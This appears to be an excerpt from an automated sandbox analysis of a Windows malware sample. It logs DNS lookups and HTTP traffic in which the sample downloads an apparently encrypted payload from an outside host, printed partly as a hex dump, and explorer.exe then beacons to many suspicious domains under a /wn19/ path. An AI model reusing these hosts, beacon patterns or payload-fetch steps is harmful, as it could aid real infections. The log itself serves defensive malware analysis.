                                                                                                                            May 12, 2022 10:45:40.940191031 CEST1.1.1.1192.168.11.200xdaf4Name error (3)www.shantelleketodietofficial.sitenonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:01.101995945 CEST1.1.1.1192.168.11.200x27a0Name error (3)www.taakyif.comnonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:27.206789017 CEST1.1.1.1192.168.11.200xc51eServer failure (2)www.rnrr.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:27.207256079 CEST1.1.1.1192.168.11.200xc51eServer failure (2)www.rnrr.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:27.207345009 CEST1.1.1.1192.168.11.200xc51eServer failure (2)www.rnrr.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:43.550352097 CEST1.1.1.1192.168.11.200xe297No error (0)www.intelios.xyz3.64.163.50A (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:06.977725029 CEST1.1.1.1192.168.11.200x826dServer failure (2)www.ayanaslifeinmalaysia.comnonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:06.977782011 CEST1.1.1.1192.168.11.200x826dServer failure (2)www.ayanaslifeinmalaysia.comnonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:08.549395084 CEST9.9.9.9192.168.11.200x826dServer failure (2)www.ayanaslifeinmalaysia.comnonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:08.549439907 CEST9.9.9.9192.168.11.200x826dServer failure (2)www.ayanaslifeinmalaysia.comnonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:22.668067932 CEST1.1.1.1192.168.11.200x716dName error (3)www.kbcoastalproperties.comnonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:43.035773993 CEST1.1.1.1192.168.11.200x98a7Name error (3)www.thebeautystore.storenonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:48:03.193999052 CEST1.1.1.1192.168.11.200x9616No error (0)www.herbalsfixng.xyzherbalsfixng.xyzCNAME (Canonical name)IN (0x0001)
                                                                                                                            May 12, 2022 10:48:03.193999052 CEST1.1.1.1192.168.11.200x9616No error (0)herbalsfixng.xyz192.64.117.165A (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:48:23.690448046 CEST1.1.1.1192.168.11.200xb9b6No error (0)www.schnellekreditfinanz.comschnellekreditfinanz.comCNAME (Canonical name)IN (0x0001)
                                                                                                                            May 12, 2022 10:48:23.690448046 CEST1.1.1.1192.168.11.200xb9b6No error (0)schnellekreditfinanz.com68.65.122.211A (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:48:49.050848007 CEST1.1.1.1192.168.11.200xfcc7Server failure (2)www.liesdevocalist.storenonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:48:49.378640890 CEST9.9.9.9192.168.11.200xfcc7Server failure (2)www.liesdevocalist.storenonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:49:05.551645994 CEST1.1.1.1192.168.11.200x1087No error (0)www.nelvashop.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                                            May 12, 2022 10:49:05.551645994 CEST1.1.1.1192.168.11.200x1087No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:49:26.016906977 CEST1.1.1.1192.168.11.200xa63No error (0)www.threads34.storeshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                                            May 12, 2022 10:49:26.016906977 CEST1.1.1.1192.168.11.200xa63No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • barsam.com.au
                                                                                                                            • www.fungismartgrid.com
                                                                                                                            • www.intelios.xyz
                                                                                                                            • www.herbalsfixng.xyz
                                                                                                                            • www.schnellekreditfinanz.com
                                                                                                                            • www.nelvashop.com
                                                                                                                            • www.threads34.store

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            0192.168.11.2049758203.170.86.8980C:\Users\user\Desktop\aSsc9zh1ex.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            May 12, 2022 10:41:57.812454939 CEST7906OUTGET /bin_QuCucbUMda229.bin HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Host: barsam.com.au
                                                                                                                            Cache-Control: no-cache
                                                                                                                            May 12, 2022 10:41:58.024772882 CEST7908INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 12 May 2022 08:41:57 GMT
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Content-Length: 189504
                                                                                                                            Connection: keep-alive
                                                                                                                            Last-Modified: Tue, 10 May 2022 23:39:04 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Raw: a8 1e 15 e2 37 1c 52 18 fc 4c 0f f1 07 94 80 0f d7 50 02 2a f8 05 95 f1 f7 88 54 8d 6d 3f 1f e2 f4 37 1b c5 bd bd 8c 84 83 2c cc 2a df 2b b5 94 ec 59 ec 9e de cf 0f 0c 68 b2 79 1c d0 95 75 73 e1 5b be 5f a3 e8 70 f9 54 d3 c3 ea ea 72 81 d8 6f 06 dd e5 3d fe fb 2a 8f 5d 6e a8 fe 98 b0 32 da 20 65 96 df 14 07 01 c9 1e 0c 78 35 26 e7 3f 62 bd 64 49 44 35 56 37 16 6c 32 66 fe 54 eb 49 84 f0 cd ea 3e 1c 1d 29 f6 4a a7 4e e3 ad 66 8e 84 72 51 46 08 9d 7d 33 f9 ac c4 d4 6f 63 bf df 63 c5 f7 65 e9 70 48 f6 2c bd 37 81 ce 3b fc 07 d7 59 e5 32 a1 64 ce df 5f ba f4 1d 2f 8e 87 5f c5 6a 7d 54 f6 36 8d e8 88 32 65 97 ec 1e 75 4e c6 a3 33 b6 53 1f 08 22 3d e9 70 b7 bd 0c b4 c2 e0 50 ca e4 30 85 c6 1c 61 20 3a e4 0b e3 40 9c 8e 1d 17 70 c1 70 cd 6d 3d 8b 71 61 03 7c 25 08 9b 58 07 3d fd fe 0c 7e 9b d0 ab 0e 44 f9 80 0d 92 f3 67 bc 6a da f6 78 94 19 47 79 da 06 5b 49 d9 ea 00 43 52 d0 3d b7 6e 29 47 50 39 fd 63 9c 9a 55 c7 c2 4d a5 de 92 c1 3b e3 4b 08 d4 e8 5c 81 92 35 dd 7a dc fd f8 f6 fe 02 a2 eb 1b 7e 34 99 2a 30 c6 d2 4e 32 71 2f 8f 9e d8 92 d5 d6 2c e4 a1 c2 00 31 5a b3 be 78 34 37 cc 52 b5 30 21 1a eb ae 82 a2 0d 99 35 09 9d ed fe c3 89 b7 40 f8 6b 93 b4 e1 72 e1 70 86 13 16 d5 5c 00 ea 6d 5a f0 a6 71 80 0d ef 19 ac 7c 8c 62 25 f6 db 26 93 89 dc db 4b 79 e3 d8 4d 58 8a db 3c 4d c8 95 1e a5 73 fd d5 c0 ab f3 72 ae 55 d4 bf 0b 96 38 16 cd 66 5c b9 9b 70 ce 89 10 cc 11 22 93 ce ba 2f c3 a5 fc d3 af 30 43 da ff 2d 69 2f e1 ed ae 5b 50 6c 85 93 63 7d df 28 f1 66 80 6c 62 67 ce b4 9a 15 2b e1 a3 12 b6 90 5e 64 b5 c1 cc 3d f4 25 62 db 2d 55 18 69 86 cf 78 99 b1 db 19 53 fc 42 6f 91 0d a8 23 9d 63 bf cb fa a5 e6 b1 42 3f fd 49 66 f1 5b cb 50 95 c1 37 51 50 55 0a 54 21 f6 61 4d 18 2c e1 57 c1 3f 02 de 85 97 ec b3 11 2e bc e9 e9 73 28 67 6b 5a 47 b1 d8 03 ea 17 ea aa dc 91 18 7e 5a 9a 7d f7 e5 1f 7d 89 6b b7 d7 7d 6a 2a 28 5e 27 8f 27 3b f2 98 36 c3 d1 79 7b d1 56 3b bf b5 8d 35 c1 ca 65 7b 58 a0 a6 89 f4 05 cc 68 dc ff 0e 40 ac ab dc d9 63 18 66 0f b0 2b ec ba 04 19 d5 05 1d d9 26 56 51 e2 0e dc 9e fd 98 e6 97 1d a4 79 1f e5 25 c9 e0 fb db 84 02 2f d4 94 4f 0b 23 62 db 68 b5 29 10 ae 18 82 a9 17 c7 50 f5 2b c1 18 d2 88 e4 6a b7 b2 59 ed ce b9 f7 d5 61 e4 48 1c 4b a1 d8 8a ba 03 3b 79 04 9c 27 77 58 ae ff 4c 68 61 70 b3 96 b2 1f 67 46 84 76 4a 0b 00 c7 fd 63 25 61 cb 83 79 64 d8 04 a9 95 80 da 07 19 b0 2e 95 7c 57 05 3a 27 a7 b9 af 4f 30 a4 f0 f1 5b d3 4b 2b f5 f8 5c b3 8c 39 fe 70 7a 02 7a e9 a9 fe e4 60 d0 54 75 ee 80 ad 88 68 4b 16 49 f2 71 6c 32 a8 51 8f 21 26 af b7 b5 4e ae b1 11 24 1a bf 7d 03 90 af 15 69 59 7a 2a f3 5b d0 ab cd fc f4 b1 1b 33 14 63 c9 c1 23 a3 66 d8 d5 13 85 7d ae 21 76 04 01 82 7b 6b f3 19 14 15 99 40 08 27 b3 af d0 e6 c3 36 db e4 fc 9f 23 61 4b 3a 2e dc 72 f9 75 de 80 fe 68 06 88 af a6 1c 67 b7 1a 4e ac 01 fb 0d 4b e8 70 f9 54 8b 40 02 e3 f9 49 5b af 3a 56 e5 3e 3f 78 ea a7 5e 66 57 1f 08 b0 32 da 20 65 96 df 14 07 01 c9 1e 0c 78 35 26 e7 3f 62 bd 64 49 44 35 56 37 16 6c 32 66 3e 54 eb 49 8a ef 77 e4 3e a8 14 e4 d7 f2 a6 02 2e 8c 32 e6 ed 01 71 36 7a f2 1a 41 98 c1 e4 b7 0e 0d d1 b0 17 e5 95 00 c9 02 3d 98 0c d4 59 a1 8a 74 af 27 ba 36 81 57 8f 69 c3 d5 7b ba f4 1d 2f 8e 87 5f 6e 96 75 be 19 ab eb 51 67 af 03 2e 03 83 13 f7 32 a3 fe 0f fa 82 6e 9b c9 e9 88 0e 51 91 d2 7b 14 50 31 5d de 18 a0 a5 33 49 59 8c e4 7e 26 25 8e 1d 17 70 c1 70 cd 6d 3d 8b 71 61 03 7c 25 08
                                                                                                                            Data Ascii: 7RLP*Tm?7,*+Yhyus[_pTro=*]n2 ex5&?bdID5V7l2fTI>)JNfrQF}3occepH,7;Y2d_/_j}T62euN3S"=pP0a :@ppm=qa|%X=~DgjxGy[ICR=n)GP9cUM;K\5z~4*0N2q/,1Zx47R0!5@krp\mZq|b%&KyMX<MsrU8f\p"/0C-i/[Plc}(flbg+^d=%b-UixSBo#cB?If[P7QPUT!aM,W?.s(gkZG~Z}}k}j*(^'';6y{V;5e{Xh@cf+&VQy%/O#bh)P+jYaHK;y'wXLhapgFvJc%ayd.|W:'O0[K+\9pzz`TuhKIql2Q!&N$}iYz*[3c#f}!v{k@'6#aK:.ruhgNKpT@I[:V>?x^fW2 ex5&?bdID5V7l2f>TIw>.2q6zA=Yt'6Wi{/_nuQg.2nQ{P1]3IY~&%ppm=qa|%
                                                                                                                            May 12, 2022 10:41:58.024833918 CEST7909INData Raw: cb 1d 07 3d b1 ff 0d 7e 3b 17 0a 44 44 f9 80 0d 92 f3 67 bc 8a da f4 79 9f 18 4d 79 da d4 59 49 d9 ea 00 43 52 d0 3d b7 1e d8 46 50 39 ed 63 9c 9a a5 c5 c2 4d a5 9e 92 c1 2b e3 4b 08 d6 e8 5c 84 92 34 dd 7a dc fd f8 f3 fe 03 a2 eb 1b 7e 34 99 da
                                                                                                                            Data Ascii: =~;DDgyMyYICR=FP9cM+K\4z~42L2q/1Jx4'R0!5@krp\mZq|b%&KyMX<MsrU8f\p"/0C-i/[Plc}(flbg
                                                                                                                            May 12, 2022 10:41:58.024882078 CEST7911INData Raw: 58 ae ff 4c 68 61 70 b3 96 b2 1f 67 46 84 76 4a 0b 00 c7 fd 63 25 61 cb 83 79 64 d8 04 a9 95 80 da 07 19 b0 2e 95 7c 57 05 3a 27 a7 b9 af 4f 30 a4 f0 f1 5b d3 4b 2b f5 f8 5c b3 8c 39 fe 70 7a 02 7a e9 a9 fe e4 60 d0 54 75 ee 80 ad 88 68 4b 16 49
                                                                                                                            Data Ascii: XLhapgFvJc%ayd.|W:'O0[K+\9pzz`TuhKIql2Q!&N$}iYz*[3c#f}!v{k@'6#aK:.ruhgNKpT@I[:V>?x^fW2 ex5&?bdID5V7l2f>T
                                                                                                                            May 12, 2022 10:41:58.024926901 CEST7912INData Raw: 21 1a eb ae 82 b2 0d 99 35 09 9d ed fe c3 89 b7 40 f8 6b 93 b4 e1 72 e1 70 86 13 16 d5 5c 00 ea 6d 5a f0 a6 71 80 0d ef 19 ac 7c 8c 62 25 f6 db 26 93 89 dc db 4b 79 e3 d8 4d 58 8a db 3c 4d c8 95 1e a5 73 fd d5 c0 ab f3 72 ae 55 d4 bf 0b 96 38 16
                                                                                                                            Data Ascii: !5@krp\mZq|b%&KyMX<MsrU8f\p"/0C-i/[Plc}(flbg+*=-UiSBo#cB_If[P7QPUT!aM,W?.s(gkZG~Z}}k}j
                                                                                                                            May 12, 2022 10:41:58.024972916 CEST7913INData Raw: d1 5b e6 dd d7 3b b2 56 27 9f 92 bd ee a8 ee 6a 55 80 cf d7 f6 fb 29 fb 41 ed d2 2a 39 1b 30 36 15 99 c3 cc 37 80 6f 55 10 b7 27 f0 3b 76 d3 26 bd 79 35 6e 54 7e c2 32 e5 46 8c 99 58 d7 f4 2d f9 3a 74 16 47 fc 30 e7 a8 17 58 25 72 b8 08 ac 12 b0
                                                                                                                            Data Ascii: [;V'jU)A*9067oU';v&y5nT~2FX-:tG0X%rV+Byu@4;ErY6I2i(zQ^T>_p%%\]1Pk\5'(J2Rckg\}0BZG_.a
                                                                                                                            May 12, 2022 10:41:58.025017977 CEST7915INData Raw: d0 4c b9 8f ab 00 73 98 82 20 0e 1a 8d 4d ab e7 83 35 4b 65 7c 0c c6 ed d5 33 56 d1 fe 32 78 7e 8f 8b 36 36 35 d6 aa f7 f6 f3 ba 40 5c 34 2b f2 ac 03 59 66 98 1f 6f a6 69 98 40 34 64 26 45 ac 85 da 05 b2 99 0e 2f e7 7c cd 06 b2 ad ab aa f5 7a 3b
                                                                                                                            Data Ascii: Ls M5Ke|3V2x~665@\4+Yfoi@4d&E/|z;U,>PiC[RN'M^mYaWH(8x@[vg_YGGYS1+L!:k[a6e'{V'JAE,/;+OaVKM#T
                                                                                                                            May 12, 2022 10:41:58.025062084 CEST7916INData Raw: f3 87 bd 5e 9f cf a5 38 9c b4 bb ca 39 12 33 26 f5 e3 c2 a9 14 b6 f8 c1 59 b8 f9 2d 14 1a 28 0d 82 1e 32 b4 f5 63 e9 ff 8e c9 8b 54 bc 16 5f 44 ec 49 f1 f2 16 04 a3 96 52 85 c5 fc c2 67 5d 12 9f 36 4d f1 bf d9 45 c9 a2 bf 67 a2 04 50 6f 44 0b e2
                                                                                                                            Data Ascii: ^893&Y-(2cT_DIRg]6MEgPoDSSZm@Tw%G}1=Ne6UE0qr2n4MqUv_Bu%0*i*sfU}I'q}[:=H)reX6",.f%{qa'
                                                                                                                            May 12, 2022 10:41:58.025108099 CEST7917INData Raw: e6 ef 15 55 56 6f be ba 9d 1f 6d 0f 1a e0 e0 da 45 83 10 f8 7e d2 d7 a1 87 da d4 99 35 1d 2e 3b 2e 86 49 30 dc 3e 78 30 91 cd 3e 35 10 90 ae 04 61 0c d4 fd 33 97 e5 13 8d 4b 6b 2e f8 21 9c e7 cc e0 d0 6b 2b 3f 2c e1 2a fa 1b 46 57 08 96 67 22 24
                                                                                                                            Data Ascii: UVomE~5.;.I0>x0>5a3Kk.!k+?,*FWg"$ac/6qldr(V}2-wQhA*i$rE>$VvQ7S{_[`x34,x%YC]Xucu,\k!;tY89a(f$~TiHJWH
                                                                                                                            May 12, 2022 10:41:58.025156021 CEST7919INData Raw: 2e 0d 2a ab 6e 2d 8c ce bc 70 9a 5b 30 5a 5a cc 47 09 41 9b b9 a3 09 74 e2 e8 5f 37 e1 da aa b8 bb 8b 9e fc f1 f3 45 bd da 82 09 4b 00 f2 33 8b f8 49 83 c1 c1 7a f2 6d a7 2a 16 46 1d 71 45 65 e7 b2 a6 de 42 bd 8e 5c aa fa bc ad 33 88 66 80 1f c3
                                                                                                                            Data Ascii: .*n-p[0ZZGAt_7EK3Izm*FqEeB\3fdm>gm~m+?v]j(,lR6T}MWRZh9vH*sdy @oYb)vzNYA52j+g.Q]}MFuWgGI
                                                                                                                            May 12, 2022 10:41:58.025203943 CEST7920INData Raw: ae 13 7c 20 6d cf db 84 27 4c 5a d6 03 1a ab 78 ba d8 0a ce 46 f7 2a a0 22 40 9d ad 5e d8 75 ba 08 c5 f0 7e 90 ac 06 48 25 01 8d a7 69 f1 54 96 4d 1f 98 87 42 7e cb ed ff c7 02 63 2e 9f 42 f9 69 ef a9 10 22 6b 41 15 0f 98 57 2e 6a 7c a8 c4 fc 2f
                                                                                                                            Data Ascii: | m'LZxF*"@^u~H%iTMB~c.Bi"kAW.j|/&_PO_MMV?"hQlQy8pYA)IJNQp,^o>ZD'cJVU\N9ybJQ<6we.F).DgpTJ3nNdx
                                                                                                                            May 12, 2022 10:41:58.233148098 CEST7922INData Raw: 03 7f e0 5d eb 1b 7e bf c5 42 36 07 11 44 01 82 a4 d2 62 19 6b cd 17 4e 1b a1 d2 00 02 3e 2b ba f3 69 d7 ff 23 b1 b9 5c e2 2a 51 92 33 ea 66 35 09 9d 66 82 7b 8d 76 bb f0 aa 5c bc 60 91 1e 70 86 13 9d 89 c4 04 2b a6 4a c3 5d fa dd f1 6e fa 53 7c
                                                                                                                            Data Ascii: ]~B6DbkN>+i#\*Q3f5f{v\`p+J]nS|bC"RJ4Ze_WLpE_cE?BB0G),aSc8fu]>(oNLR3=QgN`UbEGV_Ir7\(?U


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            1192.168.11.204976841.203.18.17780C:\Windows\explorer.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            May 12, 2022 10:45:22.157984972 CEST8171OUTGET /wn19/?jZf=NS202dJbEEETcB12VfvBfMMdjzaMJ2P7TP19ar/APX8BBmPLqx20W3tmhoszgkcRlb4O&1biX=C2MPnN HTTP/1.1
                                                                                                                            Host: www.fungismartgrid.com
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            May 12, 2022 10:45:22.336102009 CEST8172INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 12 May 2022 08:45:22 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 196
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            2192.168.11.20497703.64.163.5080C:\Windows\explorer.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            May 12, 2022 10:46:43.562331915 CEST8180OUTGET /wn19/?jZf=QQL+SjwgUyPYxJnw2qa+Hze/zpoAw1vY2ZXVt5QHdkoKCL+B47r8V4uCmI0quTqEBnpn&1biX=C2MPnN HTTP/1.1
                                                                                                                            Host: www.intelios.xyz
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            May 12, 2022 10:46:43.572695017 CEST8181INHTTP/1.1 410 Gone
                                                                                                                            Server: openresty
                                                                                                                            Date: Thu, 12 May 2022 08:46:43 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 63 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 74 65 6c 69 6f 73 2e 78 79 7a 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 7<html>9 <head>4c <meta http-equiv='refresh' content='0; url=http://www.intelios.xyz/' />a </head>8</html>0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            3192.168.11.2049773192.64.117.16580C:\Windows\explorer.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            May 12, 2022 10:48:03.358728886 CEST8199OUTGET /wn19/?jZf=/aPRIOivZv/SK3yyBSrwMHS3aEcDnGoJdVwaw0Jv+PFvpIBjQ3dFVdba2CvjMIDrv82h&1biX=C2MPnN HTTP/1.1
                                                                                                                            Host: www.herbalsfixng.xyz
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            May 12, 2022 10:48:03.525044918 CEST8200INHTTP/1.1 301 Moved Permanently
                                                                                                                            keep-alive: timeout=5, max=100
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 707
                                                                                                                            date: Thu, 12 May 2022 08:48:03 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            location: https://www.herbalsfixng.xyz/wn19/?jZf=/aPRIOivZv/SK3yyBSrwMHS3aEcDnGoJdVwaw0Jv+PFvpIBjQ3dFVdba2CvjMIDrv82h&1biX=C2MPnN
                                                                                                                            x-turbo-charged-by: LiteSpeed
                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                            x-content-type-options: nosniff
                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                                                            referrer-policy: no-referrer-when-downgrade
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            4192.168.11.204977468.65.122.21180C:\Windows\explorer.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            May 12, 2022 10:48:23.850701094 CEST8201OUTGET /wn19/?jZf=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&1biX=C2MPnN HTTP/1.1
                                                                                                                            Host: www.schnellekreditfinanz.com
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            May 12, 2022 10:48:24.014839888 CEST8202INHTTP/1.1 301 Moved Permanently
                                                                                                                            keep-alive: timeout=5, max=100
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 707
                                                                                                                            date: Thu, 12 May 2022 08:48:23 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            location: https://www.schnellekreditfinanz.com/wn19/?jZf=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&1biX=C2MPnN
                                                                                                                            x-turbo-charged-by: LiteSpeed
                                                                                                                            connection: close
